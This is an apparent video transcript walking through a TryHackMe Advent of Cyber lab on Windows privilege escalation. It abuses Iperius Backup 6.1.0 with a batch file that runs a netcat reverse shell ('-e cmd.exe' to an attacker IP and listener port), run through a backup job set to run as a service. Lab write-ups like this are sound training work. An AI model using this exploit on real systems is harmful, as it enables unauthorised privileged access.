What's up, everybody? It's DJ from Alpha Cybersecurity, and today we're taking on day 13 of TryHackMe's Admin a Cyber event. Today's challenge is going to be focused on Windows Privilege Escalation. Gotta admit, it's not one of my strong suits, but we're going to get through it together and keep the streak going. So before we get started, please remember to like the video, leave a comment in the section below, subscribe to the channel, and click the bell for notifications. This way you can be notified when I go live, when I post new videos, or when I do InfoSec Unplugged, which is live every Thursday at 6 p.m. So without further ado, let's get to the challenge. Okay, so here we're on the TryHackMe Admin a Cyber site, and it looks like today's video is done by Husky Hacks. So shout out to him. I believe he also has another video for another walkthrough on another day. So getting in multiple walkthroughs, helping out TryHackMe, that's pretty awesome. So go check out Husky Hacks. He has a really cool channel, and you could check out his video from the previous Admin a Cyber challenge as well. So we're just going to jump right into the story. We already went ahead and started up our machine and our attack machine. So while we're waiting for that to load, we'll go ahead and read the story. So the story says, McSkidy has realized that she worked on a rough draft of a disaster recovery plan, but locked down the permissions on the file to ensure that it was safe. That was smart. However, the Grinch accessed the local system and reduced permissions of her account. So can you elevate her privileges to get the file back? So the learning objectives are to understand the different types of user privileges, understand the different types of privilege escalation techniques, and then we're going to exploit a privilege escalation vulnerability. So it says, what are privileges? McSkidy made the right decision. Any malicious hacker's life is easier once they connect to a system with privileged accounts. A privileged account like Windows Administrator or root in Linux will allow them to access any file on the system, make any changes they want, and they pretty much have they have access to over everything on the account. When you restrict their privileges, it blocks them from making certain changes that could be disastrous or that they shouldn't be doing. So on a typical Windows server, you'll have different accounts. You have your domain admins. This is like your high level root. If this were Linux, they also have enterprise administrators. These accounts are like god level accounts. They have all the access that you can do. The domain is a central registry used to manage all users and computers within the organization. Then you have services. These accounts are used by software to perform other tasks like backups or antivirus. Domain users, these are like regular employees, so they have access to the network, but you should practice least privilege when given access to these domain users. And least privilege is basically having enough privileges just to do your daily jobs. So you shouldn't have a regular user whose job is to only do one or two tasks. It's giving them like domain admin privileges. And then you have your local accounts, and these are accounts that are just good on that local machine. So where your domain user, you can connect to any account that's on that domain network. Local accounts are just that local computer. So it says accounts can be easily managed with groups. For example, the McSkidy account can be created as a regular user and later be added to the domain administrators group, giving it domain admin privileges. So Windows privilege escalation vectors. So there are a bunch of different attack vectors with Windows privilege escalation. I guess we're gonna go through, looks like pretty much all of them today. So we have stored credentials. So important credentials can be saved in files or in a configuration file of an application on the target system. You have a kernel exploit where the Windows operating system installed on the target has like a known vulnerability that can be exploited to increase privilege levels. So this is like if there's a vulnerability or like if there's an unpatched system, if the Windows system or whatever operating system doesn't have the latest patches, you can probably exploit that vulnerability that was on that vulnerable version of the operating system. Next, we have insecure file and folder permissions. In some situations, even a low privilege user can have read or write privileges over files and folders that contain sensitive information. So going back to what we were talking about earlier about least privilege, you want to make sure that certain users in certain groups have access to certain files and folders. You don't want to have like your low level user having access to, payroll information or something that they shouldn't have access to. Then you have your insecure service permissions. So this is similar to permissions over files and folders. Low privilege users may have rights over services. This can somewhat be harmless, such as querying service status, or more interesting rights such as starting and stopping a service. Then you have DLL hijacking. This is a popular one. So applications use DLL files, which is basically a software that works within another application or another piece of software. So applications use DLLs to files to support their execution. You can think of these as smaller applications that can be launched by the main application. Sometimes DLLs that are deleted or not present in the system are called by the application. This error doesn't always result in a failure of the application, and the application can still run. Finding a DLL the application is looking for in a location we can write to can help create a malicious DLL file that will be run by the application. In such a case, the malicious DLL will run in the main application's privilege level. If the application is higher privilege than the current user, this could allow to launch a shell with a higher privilege level. Then you have unquoted service paths. So this was really popular in older versions of Windows. I'm not sure if it's that popular now in like Windows 10 or Windows 11. So you have, if the executable path of the service contains a space that is not enclosed within quotes, a hacker could introduce their own malicious executables to run instead of the intended executable. Then you have always install elevated. This is where Windows applications can be installed using Windows Installer or MSI packages. These files make the installation process easy and straightforward. The Windows systems can be configured with always install elevated policy. This allows the installation process to run with administrative privileges without requiring the user to have these privileges. This feature allows users to install software that may need higher privileges without having this privilege level. If always install elevated is configured, a malicious executable package as an MSI file could be run to obtain a higher privilege level. So this is similar to if when you don't have always install elevated on. This is like when you go to install something and you get that user account control prompt that says, that doo-doo, where it asks you if you're sure you want to install this. If you have always install elevated, then this bypasses that situation and you don't have to worry about installing. Even though it's convenient, situations like what was just described can happen where they can add a malicious package, and because there's no checks and balances to say, should I do this, it goes unchecked. Then there's other software applications or scripts installed on target machines may provide privilege escalation vectors. Ideally, McSkidy should explore all of these. Privilege escalation does not have a silver bullet, and the vector that will work depends not only on the configuration of the target system, but in some cases the user behavior. So finding password files on the desktop or finding notes or in the account passwords. In some cases you will need to combine 2 or more vectors to achieve the desired result. And then it kind of goes into things you could do for information gathering. So obviously information gathering is an important step in privilege escalation because this is how you uncover potential vectors. There are some automated scripts, but I think we're going to do this in a manual. We're going to do a manual enumeration here. So we're going to use the net users command, and this will list all the users. We'll run this system info to find information about the operating system and any software or anything that's installed, and then we'll run wmic, which stands for the Windows Management Windows Management Instrumentation Console, or is it in Windows Management Instrumentation Command Line or something like that? But it's basically a command that lists all the servers that are installed on the target system. Then it says, in a real engagement, you should follow the more extensive list of commands provided in our Windows Privilege Escalation room. So now this is the exploitation. Looks like there's an Iperius backup service. So let's go ahead and open up our machine. We're going to show split view. All right, so we're logged into our Windows machine. We're going to go here and we're going to type in cmd. That'll open up our command line prompt, and we're just going to run net users. And you see here we have administrator, guest, Rudolph, Alabaster, McSkidy, Sugar Plum, default account, Pepper, and the Grinch. So it says here we are McSkidy. So we know who we are on the system, and now we need to figure out how we need to get from here to either the Grinch account or an administrator account. So first we need to check what information is on the operating system. So we hit system info, and then we're going to pipe it and do find string. B C drive, and then we're going to say OS name, C OS version. We'll hit enter. Now it's going to take a couple seconds just to kind of load up all the information that we need.
A few moments later.
All right, so it looks like we're running into some technical difficulties. I don't know if I did something wrong, so let's just try this instead. So we're going to run system info, we're going to pipe, and then we're going to run find string, and instead of doing the /b and /c, let's just do OS. Okay, that's better. All right, so now this gives us Microsoft Windows Server 2019 data center is the OS name. The OS version is 10.1.17763. Manufacturer Microsoft Corporation. It's a standalone server, and there's a multiprocessor and a BIOS version. Okay. All right, so let's see what we got down here. Next, we'll run the wmic command. We'll run wmic service list, and we'll give that a second to run. And it looks like it's a little difficult to read, but if we scroll up to the top, and here is our Hyperius backup service right here, and it's running on program files, Hyperius backup, HyperiusService.exe. Okay, so let's go ahead and just answer some questions real quick. It says complete the username that started with P. So I'm going to say that was Pepper. And then the operating system. Okay, the operating system was 10.0.17.763. And then it is NA build 17.763. And then it says, what backup service did you find running on the system? And that was Hyperius. That was the Hyperius service. Okay, so we have the Hyperius SVC. And this is what is the path of the executable, the backup service you identified. So the path is C program files I think we have to do x86 Hyperius backup, and then is Hyperius service.exe. Okay, so we got that information. So now we need to find out more about this Hyperius server. So Hyperius service. So we'll go here, we'll open up Windows, we'll search, and we'll hit Hyperius backup. And let's see what information we can get. So there's home, restore, tools, about, Hyperius backup 6.1.0. So let's switch to our attack machine real quick. just because we need to go here and check Google. Okay, sure, I agree. And then we'll go Hyperius 6.1.0. Let's just put exploit and just bring it up here. And there is a exploit DB exploit here. So it looks here. So here's the vendor post. The details. Hyperia's backup service must run as a local system or a system administrator. By default, the application allows for low privilege users to create and run backup jobs. An option when creating backup is to run a program before or after the backup job. The backup job is run as the user of the running service, such as the program requested to run before or after a backup is run as that same user. A low privilege user could abuse this and escalate their privileges to either the local system or administrator account. So there's prerequisites to successfully exploit the vulnerability. An attacker must already have local access to a system running Hyperia's backup and Hyperia's backup service using a low privilege user account, which we already have. Then it says we need to download Netcat, which I believe is already on the machine. Then it says you have to create a batch file and send this command. Okay, so what we'll do is we'll make a batch file on our desktop, and the batch file will run this command. Since we're here on our attack machine already, let's just minimize this, go here, open this up. We are 10.10.190.8, so we're going to run netcat-nlvp. So we're telling Netcat to not resolve domain names. We're telling it to listen verbosely on port. We're going to say 5555. So we'll have that running in the background, and then we'll run back to our machine. And then from our desktop, we'll just right click, hit new, and we'll open up a text document, and we'll name the text document, I don't know, please subscribe. Okay, so now the next thing we want to do is, let's go here to open up our folders. Let's go to desktop, please subscribe, and then we're going to change the view, and we're going to do file name extensions, so this way you can see the text the .txt, and we'll change that to a batch file later. But in the meantime, what we want it to do is we want to run this netcat command. So we're going to run we're going to say at echo off, and then we're going to say C users McSkidy downloads netcat.exe, and then we're going to go to our IP address, which was, I believe it was 10.10.190.8. So 10.10.190.8, and then we're going to run -e, and we're going to say command.exe. So what we're doing is, back to our attack machine that's listening on port 5555, we're saying netcat and connect to 10.10.190.8 on port 5555, and then execute this -e, execute command.exe. So if it works, then what will happen is the listener on the attack machine will catch this command, and it'll give us access to the command prompt. So we'll go ahead and save this. We'll close it, and then what we'll do is we'll rename the file, and instead of .txt, it'll be .bat for batch. Yes, we're aware of that. And now if we double click and we look over at our attack machine, there is our shell, and as you can see, it is the Grinch hack McSkidy. So we have access. We know the shell works. So now we need to make it work so we can get our privilege escalated. So now what we need to do is we need to run a backup job. Let's see, let's add a folder to backup, or let's see. Okay, I don't think it really matters what we run to backup. So let's just go, let's just say McSkidy, let's say McSkidy desktop, and we'll run okay. We'll go next, and there's destinations, scheduling, options, email notifications, and then other processes. And when we go to run other processes, I believe it's run a program or open an external file. So we'll select, and we'll hit please subscribe and hit open. I think that's all we need to do. So we hit next, we hit OK. Please specify at least an item and destination. Oh, we did that already. Okay, so let's do McSkidy documents. Okay, hit OK. All right, so we added our please subscribe.batch file in here. We hit next, we hit OK. It says we need to specify a location, which I believe we did. Okay. All right, so we have our backup job created, and now when you right click here, it'll say run backup or run backup as service. So if you run backup as a regular backup, it's just going to run as the user we're signed in as, which is the McSkidy user. But we want to elevate privileges, so we have to run the backup as a service, because you see that is run as the Grinch user. So we'll go ahead and click that, and then it'll say backup will run automatically. We'll hit continue. And now we connect to our attack box, and we have our shell. And if you actually click, if you actually type in who am I, you'll see we are now the Grinch user. So since we're the Grinch user, we now have access to the Grinch's files. So let's see here. Run the who am I command on the connection you have received on your attacking machine. What user do you have? And that is the Grinch hack / the Grinch. And just on the safe side, we'll do C. Okay. And then it says, what is the content of the flag.txt file? So let's go ahead and move to C users, the Grinch. I'm sorry, we said C. I meant to do change directory. So change directory CD. So I meant to say change directory. So CD C users, the Grinch. And now we run the dir command, and if we cd into their desktop, and then we run the dir command again, we have a WinPeas64. Okay, so it's not there, so let's back up and let's check the documents. And we have flag and schedule. So let's go ahead and type flag.txt. That's our flag. And then let's also type schedule.txt. And let's see, 4 o'clock, wallow in self-pity. 4:30, stare into the abyss. 5 o'clock, solve world hunger and tell no one. 5:30 Jazzercise, 6:30 dinner with me. I can't cancel that again. And 7 o'clock wrestle with my self-loathing. All right. So the flag.txt file is THM 736635221. And the Grinch forgot to delete a file. Where will he be at 5:30? That is Jazzercise. If I can spell. And we have now completed day 13 of TryHackMe's Advent in Cyber. So just to recap, we were able to log in as a low-level user, McSkidy. We used our command prompt to find out what operating system we were running, what services were running on the machine, and with that we found the Hyperius backup service that was running an outdated 6.1.0. We then Googled what that version was vulnerable to, and there was a privilege escalation vulnerability, which allowed us to run a batch file with a command which would run a shell, a reverse shell back to our attack machine. So we created the batch file, then we backed up our documents folder, but then we also ran this service in the backup. And when it did that, it executed that netcat command, which then communicated with our listener and gave us a shell as the Grinch user. So that was day 13, and like I said, I think there might be other ways to elevate privileges, but for the sake of the challenge, we are done. So that was today's challenge. Again, a big shout out and thank you to TryHackMe for putting this all together. A shout out for Husky Hacks who did today's video. And keep the streak going, keep hacking, and make sure you tune in tomorrow. And if you run into any challenges, make sure you check out who's doing the walkthrough video. So I'll see you guys later. Take care.